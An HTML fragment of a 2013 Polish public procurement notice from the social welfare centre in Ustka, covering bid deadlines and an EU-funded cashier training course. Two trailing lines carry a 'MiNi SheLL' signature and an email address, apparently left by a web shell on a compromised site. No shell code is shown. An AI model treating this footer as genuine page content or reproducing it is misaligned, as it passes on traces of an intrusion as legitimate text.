Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.ustka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Ustce, ul. Piotra Dunina 24, 76-270 Ustka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 15:00, miejsce: Ofertę należy dostarczyć do siedziby Zamawiającego i zaadresować: Gminny Ośrodek Pomocy Społecznej w Ustce, ul. Piotra Dunina 24, 76-270 Ustka (pok. nr 15)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia pn. Sprzedawca z obsługą kasy fiskalnej, w ramach projektu systemowego pn. Ty też możesz -  Zadanie 1. Aktywna integracja. Projekt jest realizowany przez Gminny Ośrodek Pomocy Społecznej w Ustce w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013,  Działanie 7.1., Poddziałanie 7.1.1., współfinansowany ze środków Unii  Europejskiej w ramach  Europejskiego  Funduszu  Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com